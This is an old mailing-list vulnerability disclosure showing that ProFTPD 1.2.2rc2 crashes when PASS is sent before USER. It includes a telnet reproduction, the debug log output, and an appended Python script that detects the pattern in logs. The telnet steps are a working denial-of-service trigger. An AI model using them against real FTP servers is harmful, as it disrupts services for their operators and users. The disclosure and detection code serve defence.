ProFTPD 1.2.2rc2 DoS

From: Daniel (danielat_private)
Date: Sun Jun 03 2001 - 15:53:34 PDT


    I've discovered that ProFTPD 1.2.2rc2 has a bug - each instance of the
    daemon can be crashed remotely.
    This happens when the PASS command is received before the USER command:

    box:~# telnet 127.0.0.1 21
    Trying 127.0.0.1...
    Connected to 127.0.0.1.
    Escape character is '^]'.
    220 ProFTPD 1.2.2rc2 Server (ProFTPD Default Installation) [box.xxx.com]
    pass
    Connection closed by foreign host.
    box:~#

    If you run proftpd -d 5 (debug mode, level 5), in the logs you see:

    box.xxx.com (localhost[127.0.0.1]) - FTP session opened.
    box.xxx.com (localhost[127.0.0.1]) - received: PASS (hidden)
    box.xxx.com (localhost[127.0.0.1]) - ProFTPD terminating (signal 11)
    
     - Daniel Volozov
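
Added example, not part of the original post: a log check that flags sessions in which PASS was received before any USER, and whether that session then terminated with signal 11, as in the debug output above. Assumptions: sessions are keyed by the client field in parentheses because the quoted lines carry no PID, and the second client and its "received: USER" and "FTP session closed." lines are constructed for contrast.

```python
import re

# Constructed sample: the three debug lines quoted in the post, followed by
# a made-up second client (192.0.2.10) that logs in in the normal order.
SAMPLE_LOG = """\
box.xxx.com (localhost[127.0.0.1]) - FTP session opened.
box.xxx.com (localhost[127.0.0.1]) - received: PASS (hidden)
box.xxx.com (localhost[127.0.0.1]) - ProFTPD terminating (signal 11)
box.xxx.com (client[192.0.2.10]) - FTP session opened.
box.xxx.com (client[192.0.2.10]) - received: USER alice
box.xxx.com (client[192.0.2.10]) - received: PASS (hidden)
box.xxx.com (client[192.0.2.10]) - FTP session closed.
"""

LINE_RE = re.compile(r"^\S+ \((?P<peer>[^)]*)\) - (?P<msg>.*)$")


def find_pass_before_user(log_text):
    """Return one finding per session in which PASS arrived before USER.

    Each finding is (peer, crashed); crashed is True when the same session
    then logged "terminating (signal 11)".
    """
    sessions = {}   # peer -> {"user_seen": bool, "finding": index or None}
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        peer, msg = m.group("peer"), m.group("msg")
        if msg.startswith("FTP session opened"):
            sessions[peer] = {"user_seen": False, "finding": None}
            continue
        state = sessions.setdefault(peer, {"user_seen": False, "finding": None})
        if msg.startswith("received: USER"):
            state["user_seen"] = True
        elif msg.startswith("received: PASS") and not state["user_seen"]:
            if state["finding"] is None:
                state["finding"] = len(findings)
                findings.append([peer, False])
        elif "terminating (signal 11)" in msg and state["finding"] is not None:
            findings[state["finding"]][1] = True
    return [tuple(f) for f in findings]


if __name__ == "__main__":
    for peer, crashed in find_pass_before_user(SAMPLE_LOG):
        print(f"{peer}: PASS before USER, crashed={crashed}")
```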
    


